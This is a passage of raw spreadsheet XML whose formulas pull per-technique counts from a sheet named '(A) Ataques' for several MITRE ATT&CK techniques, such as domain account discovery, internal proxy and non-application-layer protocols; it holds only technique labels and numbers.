        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A25" s="79">
        <f t="shared" si="0"/>
        <v>23</v>
      </c>
      <c r="B25" s="4">
        <f>IF('(A) Ataques'!AK25&lt;&gt;"NO",'(A) Ataques'!E25,"")</f>
        <v>19</v>
      </c>
      <c r="C25" s="6" t="str">
        <f>IF('(A) Ataques'!AK25&lt;&gt;"NO",IF('(A) Ataques'!M25="","",'(A) Ataques'!M25),"")</f>
        <v>T1087.002-AccountDiscovery_DomainAccount</v>
      </c>
      <c r="D25" s="4" t="str">
        <f>IF('(A) Ataques'!AK25&lt;&gt;"NO",'(A) Ataques'!F25,"")</f>
        <v>T1087</v>
      </c>
      <c r="E25" s="286">
        <f>IF('(A) Ataques'!AK25&lt;&gt;"NO",'(A) Ataques'!AQ25,"")</f>
        <v>2</v>
      </c>
      <c r="F25" s="288">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!BB25,"")</f>
        <v>24</v>
      </c>
      <c r="G25" s="392">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!BD25,"")</f>
        <v>2</v>
      </c>
      <c r="H25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!BF25,"")</f>
        <v>2</v>
      </c>
      <c r="I25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!BG25,"")</f>
        <v>1</v>
      </c>
      <c r="J25" s="530">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($F25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BH25,"")</f>
        <v>11</v>
      </c>
      <c r="L25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BJ25,"")</f>
        <v>4</v>
      </c>
      <c r="M25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BL25,"")</f>
        <v>4</v>
      </c>
      <c r="N25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BM25,"")</f>
        <v>2</v>
      </c>
      <c r="O25" s="532">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($K25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P25" s="292">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BN25,"")</f>
        <v>35</v>
      </c>
      <c r="Q25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BP25,"")</f>
        <v>6</v>
      </c>
      <c r="R25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BR25,"")</f>
        <v>6</v>
      </c>
      <c r="S25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BS25,"")</f>
        <v>2</v>
      </c>
      <c r="T25" s="530">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($P25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BT25,"")</f>
        <v>42</v>
      </c>
      <c r="V25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BV25,"")</f>
        <v>10</v>
      </c>
      <c r="W25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BX25,"")</f>
        <v>9</v>
      </c>
      <c r="X25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$BY25,"")</f>
        <v>2</v>
      </c>
      <c r="Y25" s="532">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($U25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z25" s="288">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!BZ25,"")</f>
        <v>36</v>
      </c>
      <c r="AA25" s="392">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!CB25,"")</f>
        <v>13</v>
      </c>
      <c r="AB25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!CD25,"")</f>
        <v>13</v>
      </c>
      <c r="AC25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!CE25,"")</f>
        <v>2</v>
      </c>
      <c r="AD25" s="331">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF(Z25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CF25,"")</f>
        <v>78</v>
      </c>
      <c r="AF25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CH25,"")</f>
        <v>23</v>
      </c>
      <c r="AG25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CJ25,"")</f>
        <v>22</v>
      </c>
      <c r="AH25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CK25,"")</f>
        <v>2</v>
      </c>
      <c r="AI25" s="287">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($AE25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ25" s="292">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CL25,"")</f>
        <v>0</v>
      </c>
      <c r="AK25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CN25,"")</f>
        <v>0</v>
      </c>
      <c r="AL25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CP25,"")</f>
        <v>0</v>
      </c>
      <c r="AM25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CQ25,"")</f>
        <v>0</v>
      </c>
      <c r="AN25" s="331">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($AJ25=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CR25,"")</f>
        <v>4</v>
      </c>
      <c r="AP25" s="322">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CT25,"")</f>
        <v>3</v>
      </c>
      <c r="AQ25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CV25,"")</f>
        <v>3</v>
      </c>
      <c r="AR25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!$CW25,"")</f>
        <v>1</v>
      </c>
      <c r="AS25" s="287">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($AO25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT25" s="288">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!CX25,"")</f>
        <v>39</v>
      </c>
      <c r="AU25" s="392">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!CZ25,"")</f>
        <v>9</v>
      </c>
      <c r="AV25" s="4">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!DB25,"")</f>
        <v>9</v>
      </c>
      <c r="AW25" s="20">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",'(A) Ataques'!DC25,"")</f>
        <v>2</v>
      </c>
      <c r="AX25" s="331">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($AT25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY25" s="469">
        <f>'(A) Ataques'!LU25+'(A) Ataques'!MA25+'(A) Ataques'!MG25+'(A) Ataques'!MM25+'(A) Ataques'!MS25</f>
        <v>4</v>
      </c>
      <c r="AZ25" s="510">
        <f>'(A) Ataques'!LW25+'(A) Ataques'!MC25+'(A) Ataques'!MI25+'(A) Ataques'!MO25+'(A) Ataques'!MU25</f>
        <v>4</v>
      </c>
      <c r="BA25" s="471">
        <f>'(A) Ataques'!LY25+'(A) Ataques'!ME25+'(A) Ataques'!MK25+'(A) Ataques'!MQ25+'(A) Ataques'!MW25</f>
        <v>2</v>
      </c>
      <c r="BB25" s="471">
        <f>'(A) Ataques'!LQ25</f>
        <v>2</v>
      </c>
      <c r="BC25" s="331">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($AY25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD25" s="469">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!LL25,"")</f>
        <v>4</v>
      </c>
      <c r="BE25" s="510">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!LM25,"")</f>
        <v>4</v>
      </c>
      <c r="BF25" s="471">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!LN25,"")</f>
        <v>2</v>
      </c>
      <c r="BG25" s="471">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!LO25,"")</f>
        <v>0</v>
      </c>
      <c r="BH25" s="471">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!LS25,"")</f>
        <v>2</v>
      </c>
      <c r="BI25" s="331">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($BD25=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ25" s="469">
        <f>'(A) Ataques'!OL25+'(A) Ataques'!OR25+'(A) Ataques'!OX25+'(A) Ataques'!PD25+'(A) Ataques'!PJ25</f>
        <v>0</v>
      </c>
      <c r="BK25" s="510">
        <f>'(A) Ataques'!ON25+'(A) Ataques'!OT25+'(A) Ataques'!OZ25+'(A) Ataques'!PF25+'(A) Ataques'!PL25</f>
        <v>0</v>
      </c>
      <c r="BL25" s="471">
        <f>'(A) Ataques'!OP25+'(A) Ataques'!OV25+'(A) Ataques'!PB25+'(A) Ataques'!PH25+'(A) Ataques'!PN25</f>
        <v>0</v>
      </c>
      <c r="BM25" s="495">
        <f>'(A) Ataques'!OH25</f>
        <v>0</v>
      </c>
      <c r="BN25" s="331">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($BJ25=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO25" s="469">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!OC25,"")</f>
        <v>0</v>
      </c>
      <c r="BP25" s="510">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!OD25,"")</f>
        <v>0</v>
      </c>
      <c r="BQ25" s="471">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!OE25,"")</f>
        <v>0</v>
      </c>
      <c r="BR25" s="471">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!OF25,"")</f>
        <v>0</v>
      </c>
      <c r="BS25" s="471">
        <f>IF('(A) Ataques'!$AP25&lt;&gt;"NO",'(A) Ataques'!OJ25,"")</f>
        <v>0</v>
      </c>
      <c r="BT25" s="331">
        <f>IF('(A) Ataques'!$AK25&lt;&gt;"NO",IF($BO25=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A26" s="79">
        <f t="shared" si="0"/>
        <v>24</v>
      </c>
      <c r="B26" s="4">
        <f>IF('(A) Ataques'!AK26&lt;&gt;"NO",'(A) Ataques'!E26,"")</f>
        <v>20</v>
      </c>
      <c r="C26" s="6" t="str">
        <f>IF('(A) Ataques'!AK26&lt;&gt;"NO",IF('(A) Ataques'!M26="","",'(A) Ataques'!M26),"")</f>
        <v>T1090.001-Proxy_internal_proxy</v>
      </c>
      <c r="D26" s="4" t="str">
        <f>IF('(A) Ataques'!AK26&lt;&gt;"NO",'(A) Ataques'!F26,"")</f>
        <v>T1090</v>
      </c>
      <c r="E26" s="286">
        <f>IF('(A) Ataques'!AK26&lt;&gt;"NO",'(A) Ataques'!AQ26,"")</f>
        <v>23</v>
      </c>
      <c r="F26" s="288">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!BB26,"")</f>
        <v>4</v>
      </c>
      <c r="G26" s="392">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!BD26,"")</f>
        <v>4</v>
      </c>
      <c r="H26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!BF26,"")</f>
        <v>2</v>
      </c>
      <c r="I26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!BG26,"")</f>
        <v>2</v>
      </c>
      <c r="J26" s="530">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($F26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BH26,"")</f>
        <v>6</v>
      </c>
      <c r="L26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BJ26,"")</f>
        <v>6</v>
      </c>
      <c r="M26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BL26,"")</f>
        <v>3</v>
      </c>
      <c r="N26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BM26,"")</f>
        <v>2</v>
      </c>
      <c r="O26" s="532">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($K26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P26" s="292">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BN26,"")</f>
        <v>10</v>
      </c>
      <c r="Q26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BP26,"")</f>
        <v>10</v>
      </c>
      <c r="R26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BR26,"")</f>
        <v>5</v>
      </c>
      <c r="S26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BS26,"")</f>
        <v>3</v>
      </c>
      <c r="T26" s="530">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($P26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BT26,"")</f>
        <v>57</v>
      </c>
      <c r="V26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BV26,"")</f>
        <v>21</v>
      </c>
      <c r="W26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BX26,"")</f>
        <v>4</v>
      </c>
      <c r="X26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$BY26,"")</f>
        <v>17</v>
      </c>
      <c r="Y26" s="532">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($U26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z26" s="288">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!BZ26,"")</f>
        <v>42</v>
      </c>
      <c r="AA26" s="392">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!CB26,"")</f>
        <v>12</v>
      </c>
      <c r="AB26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!CD26,"")</f>
        <v>6</v>
      </c>
      <c r="AC26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!CE26,"")</f>
        <v>5</v>
      </c>
      <c r="AD26" s="331">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF(Z26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CF26,"")</f>
        <v>99</v>
      </c>
      <c r="AF26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CH26,"")</f>
        <v>33</v>
      </c>
      <c r="AG26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CJ26,"")</f>
        <v>10</v>
      </c>
      <c r="AH26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CK26,"")</f>
        <v>17</v>
      </c>
      <c r="AI26" s="287">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($AE26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ26" s="292">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CL26,"")</f>
        <v>0</v>
      </c>
      <c r="AK26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CN26,"")</f>
        <v>0</v>
      </c>
      <c r="AL26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CP26,"")</f>
        <v>0</v>
      </c>
      <c r="AM26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CQ26,"")</f>
        <v>0</v>
      </c>
      <c r="AN26" s="331">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($AJ26=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CR26,"")</f>
        <v>0</v>
      </c>
      <c r="AP26" s="322">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CT26,"")</f>
        <v>0</v>
      </c>
      <c r="AQ26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CV26,"")</f>
        <v>0</v>
      </c>
      <c r="AR26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!$CW26,"")</f>
        <v>0</v>
      </c>
      <c r="AS26" s="287">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($AO26=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT26" s="288">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!CX26,"")</f>
        <v>10</v>
      </c>
      <c r="AU26" s="392">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!CZ26,"")</f>
        <v>10</v>
      </c>
      <c r="AV26" s="4">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!DB26,"")</f>
        <v>5</v>
      </c>
      <c r="AW26" s="20">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",'(A) Ataques'!DC26,"")</f>
        <v>3</v>
      </c>
      <c r="AX26" s="331">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($AT26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY26" s="469">
        <f>'(A) Ataques'!LU26+'(A) Ataques'!MA26+'(A) Ataques'!MG26+'(A) Ataques'!MM26+'(A) Ataques'!MS26</f>
        <v>7</v>
      </c>
      <c r="AZ26" s="510">
        <f>'(A) Ataques'!LW26+'(A) Ataques'!MC26+'(A) Ataques'!MI26+'(A) Ataques'!MO26+'(A) Ataques'!MU26</f>
        <v>4</v>
      </c>
      <c r="BA26" s="471">
        <f>'(A) Ataques'!LY26+'(A) Ataques'!ME26+'(A) Ataques'!MK26+'(A) Ataques'!MQ26+'(A) Ataques'!MW26</f>
        <v>1</v>
      </c>
      <c r="BB26" s="471">
        <f>'(A) Ataques'!LQ26</f>
        <v>4</v>
      </c>
      <c r="BC26" s="331">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($AY26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD26" s="469">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!LL26,"")</f>
        <v>61</v>
      </c>
      <c r="BE26" s="510">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!LM26,"")</f>
        <v>29</v>
      </c>
      <c r="BF26" s="471">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!LN26,"")</f>
        <v>1</v>
      </c>
      <c r="BG26" s="471">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!LO26,"")</f>
        <v>5</v>
      </c>
      <c r="BH26" s="471">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!LS26,"")</f>
        <v>20</v>
      </c>
      <c r="BI26" s="331">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($BD26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ26" s="469">
        <f>'(A) Ataques'!OL26+'(A) Ataques'!OR26+'(A) Ataques'!OX26+'(A) Ataques'!PD26+'(A) Ataques'!PJ26</f>
        <v>47</v>
      </c>
      <c r="BK26" s="510">
        <f>'(A) Ataques'!ON26+'(A) Ataques'!OT26+'(A) Ataques'!OZ26+'(A) Ataques'!PF26+'(A) Ataques'!PL26</f>
        <v>19</v>
      </c>
      <c r="BL26" s="471">
        <f>'(A) Ataques'!OP26+'(A) Ataques'!OV26+'(A) Ataques'!PB26+'(A) Ataques'!PH26+'(A) Ataques'!PN26</f>
        <v>2</v>
      </c>
      <c r="BM26" s="495">
        <f>'(A) Ataques'!OH26</f>
        <v>15</v>
      </c>
      <c r="BN26" s="331">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($BJ26=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO26" s="469">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!OC26,"")</f>
        <v>47</v>
      </c>
      <c r="BP26" s="510">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!OD26,"")</f>
        <v>19</v>
      </c>
      <c r="BQ26" s="471">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!OE26,"")</f>
        <v>2</v>
      </c>
      <c r="BR26" s="471">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!OF26,"")</f>
        <v>1</v>
      </c>
      <c r="BS26" s="471">
        <f>IF('(A) Ataques'!$AP26&lt;&gt;"NO",'(A) Ataques'!OJ26,"")</f>
        <v>15</v>
      </c>
      <c r="BT26" s="331">
        <f>IF('(A) Ataques'!$AK26&lt;&gt;"NO",IF($BO26=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A27" s="79">
        <f t="shared" si="0"/>
        <v>25</v>
      </c>
      <c r="B27" s="4">
        <f>IF('(A) Ataques'!AK27&lt;&gt;"NO",'(A) Ataques'!E27,"")</f>
        <v>21</v>
      </c>
      <c r="C27" s="6" t="str">
        <f>IF('(A) Ataques'!AK27&lt;&gt;"NO",IF('(A) Ataques'!M27="","",'(A) Ataques'!M27),"")</f>
        <v>T1095-Non_Application_Layer</v>
      </c>
      <c r="D27" s="4" t="str">
        <f>IF('(A) Ataques'!AK27&lt;&gt;"NO",'(A) Ataques'!F27,"")</f>
        <v>T1095</v>
      </c>
      <c r="E27" s="286">
        <f>IF('(A) Ataques'!AK27&lt;&gt;"NO",'(A) Ataques'!AQ27,"")</f>
        <v>2</v>
      </c>
      <c r="F27" s="288">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!BB27,"")</f>
        <v>3</v>
      </c>
      <c r="G27" s="392">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!BD27,"")</f>
        <v>2</v>
      </c>
      <c r="H27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!BF27,"")</f>
        <v>2</v>
      </c>
      <c r="I27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!BG27,"")</f>
        <v>2</v>
      </c>
      <c r="J27" s="530">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($F27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BH27,"")</f>
        <v>4</v>
      </c>
      <c r="L27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BJ27,"")</f>
        <v>4</v>
      </c>
      <c r="M27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BL27,"")</f>
        <v>4</v>
      </c>
      <c r="N27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BM27,"")</f>
        <v>2</v>
      </c>
      <c r="O27" s="532">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($K27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P27" s="292">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BN27,"")</f>
        <v>7</v>
      </c>
      <c r="Q27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BP27,"")</f>
        <v>6</v>
      </c>
      <c r="R27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BR27,"")</f>
        <v>6</v>
      </c>
      <c r="S27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BS27,"")</f>
        <v>2</v>
      </c>
      <c r="T27" s="530">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($P27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BT27,"")</f>
        <v>18</v>
      </c>
      <c r="V27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BV27,"")</f>
        <v>8</v>
      </c>
      <c r="W27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BX27,"")</f>
        <v>8</v>
      </c>
      <c r="X27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$BY27,"")</f>
        <v>2</v>
      </c>
      <c r="Y27" s="532">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($U27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z27" s="288">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!BZ27,"")</f>
        <v>12</v>
      </c>
      <c r="AA27" s="392">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!CB27,"")</f>
        <v>9</v>
      </c>
      <c r="AB27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!CD27,"")</f>
        <v>9</v>
      </c>
      <c r="AC27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!CE27,"")</f>
        <v>2</v>
      </c>
      <c r="AD27" s="331">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF(Z27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CF27,"")</f>
        <v>30</v>
      </c>
      <c r="AF27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CH27,"")</f>
        <v>17</v>
      </c>
      <c r="AG27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CJ27,"")</f>
        <v>17</v>
      </c>
      <c r="AH27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CK27,"")</f>
        <v>2</v>
      </c>
      <c r="AI27" s="287">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($AE27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ27" s="292">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CL27,"")</f>
        <v>0</v>
      </c>
      <c r="AK27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CN27,"")</f>
        <v>0</v>
      </c>
      <c r="AL27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CP27,"")</f>
        <v>0</v>
      </c>
      <c r="AM27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CQ27,"")</f>
        <v>0</v>
      </c>
      <c r="AN27" s="331">
